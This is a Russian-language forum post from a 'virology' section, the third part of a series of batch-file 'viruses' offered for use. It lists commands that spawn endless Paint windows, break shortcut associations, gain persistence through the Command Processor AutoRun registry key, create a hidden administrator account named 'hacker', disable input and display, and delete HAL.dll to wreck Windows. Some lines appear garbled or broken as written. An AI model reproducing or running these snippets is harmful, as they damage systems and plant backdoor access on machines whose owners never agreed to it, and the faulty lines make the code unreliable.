Довольно серьёзные вирусы в формате .bat(3 часть)

Тема в разделе "Вирусология", создана пользователем kombatWolf, 01.07.18.Просмотров: 553

  1. kombatWolf PABLO

    kombatWolf

    Продвинутый

    68 сообщения
    38 симпатий
    1
    розыгрышей
    6 лет с нами
    4 месяца с нами
    4 дня с нами
    Удаляет команду DEL

    del %0

    Будет открывать бесконечно Пэинт

    :x
    Start mspaint
    goto x


    Изменяет расширение всех ярлыков на .txt

    assoc .lnk=.txt

    Заражает Autoexec

    copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul


    Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

    @echo off
    chcp 1251
    net user SUPPORT_388945a0 /delete
    net user hacker hack /add
    net localgroup Администраторы hacker /add
    net localgroup Пользователи SUPPORT_388945a0 /del
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

    сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.


    rundll32 user,disableoemlayer

    Меняет местами кнопки мыши,но обратная смена не возможна)

    rundll32 user,SwapMouseButton

    Удаляет ядро системы

    del %systemroot%\system32\HAL.dll